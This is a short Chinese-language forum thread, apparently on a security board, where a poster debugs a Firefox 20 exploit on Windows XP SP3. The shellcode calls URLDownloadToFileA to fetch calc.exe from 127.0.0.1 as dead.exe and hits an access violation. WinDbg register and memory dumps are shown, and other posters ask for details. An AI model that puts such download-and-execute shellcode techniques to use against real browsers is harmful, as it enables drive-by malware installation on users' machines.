请奉上平台详细版本与具体各种堆栈参数信息图。

请楼主讲明firefox详细版本，调试信息

楼上两位高级黑

windows xp sp3 firefox 20
call eax  (eax为URLDownloadToFileA函数地址)
urlmon!URLDownloadToFileA:
1a494bbe 8bff            mov     edi,edi
1a494bc0 55              push    ebp
1a494bc1 8bec            mov     ebp,esp
1a494bc3 81ec14010000    sub     esp,114h
1a494bc9 a198934c1a      mov     eax,dword ptr [urlmon!IsJITInProgress+0xdf72 (1a4c9398)]
1a494bce 33c5            xor     eax,ebp
参数情况：
0:000> dd esp
0c101010  0c10111f 00000000 0c101168 0c10104c
0c101020  00000000 00000000 444c5255 6c6e776f

0:000> db 0c101168
0c101168  68 74 74 70 3a 2f 2f 31-32 37 2e 30 2e 30 2e 31  http://127.0.0.1
0c101178  2f 63 61 6c 63 2e 65 78-65 00 79 43 6d 77 79 43  /calc.exe.
0:000> d 0c10104c
0c10104c  64 65 61 64 2e 65 78 65-00 00 00 00 33 c9 64 8b  dead.exe.

执行时出错：
(1b8.f2c): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000204 ebx=0c1001c0 ecx=0c100198 edx=00000000 esi=00000000 edi=00150000
eip=7c90e8c5 esp=0c0fff64 ebp=0c100178 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010202
ntdll!strchr+0xd8:
7c90e8c5 53              push    ebx

换了几种不同的shellcode都是这样的情况，感觉应该不是shellcode的问题，是否存在firefox对URLDownloadToFileA函数的一些处理？

是不是参数赋值错误了？